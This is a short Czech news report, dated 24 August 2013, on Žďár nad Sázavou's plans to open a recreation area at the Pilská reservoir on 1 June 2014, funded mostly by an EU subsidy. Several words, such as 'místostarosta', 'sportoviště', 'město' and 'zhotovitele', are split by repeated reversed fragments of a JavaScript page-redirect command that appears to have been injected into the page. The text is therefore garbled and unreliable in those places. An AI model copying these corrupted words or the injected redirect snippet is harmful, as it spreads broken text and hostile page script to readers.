Žďár nad Sázavou, Pilská nádrž, rekreační areál
Rainbow page separator

Areál u Pilské nádrže chce radnice otevřít 1. června

Sobota, 24. srpna 2013

Žďár nad Sázavou / Plánovaný termín zprovoznění rekreačního areálu u Pilské nádrže již zveřejnili zástupci žďárské radnice. „Máme takovou vizi, že bychom slavnostní otevření uspořádali příští rok na Den dětí, tedy 1. června 2014,“ uvedl žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Ladislav Bárta. Dodal, že hřiště, spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště, prolézačky, amfiteátr pro konání kulturních a společenských akcí či občerstvení na celkové ploše 50 tisíc metrů čtverečních budou dokončeny příští rok v květnu. U rybníka nebudou chybět převlékárny, sprchy a molo s půjčovnou loděk a šlapadel.

První stavební práce by se měly rozběhnout v následujících týdnech, měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to už z celkem tří uchazečů ve výběrovém řízení vybralo zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele stavby.

Projekt s názvem Žďárský Santiniho okruh za poznáním a aktivním vyžitím za zhruba třicet milionů korun, který zahrnuje vybudování areálu u Pilské nádrže i turistické cesty poblíž kostela svatého Jana Nepomuckého na Zelené hoře, podpořila bezmála třiadvaceti milionová evropská dotace.